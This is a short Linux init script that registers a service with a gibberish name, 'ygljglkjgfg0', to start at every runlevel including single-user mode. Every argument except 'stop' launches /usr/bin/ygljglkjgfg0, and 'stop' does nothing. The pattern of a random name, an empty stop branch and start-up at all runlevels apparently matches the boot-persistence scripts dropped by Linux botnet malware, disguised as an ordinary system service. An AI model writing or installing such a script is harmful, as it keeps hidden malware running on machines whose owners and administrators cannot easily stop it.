#!/bin/sh
# chkconfig: 12345 90 90
# description: ygljglkjgfg0
### BEGIN INIT INFO
# Provides:		ygljglkjgfg0
# Required-Start:	
# Required-Stop:	
# Default-Start:	1 2 3 4 5
# Default-Stop:		
# Short-Description:	ygljglkjgfg0
### END INIT INFO
case $1 in
start)
	/usr/bin/ygljglkjgfg0
	;;
stop)
	;;
*)
	/usr/bin/ygljglkjgfg0
	;;
esac
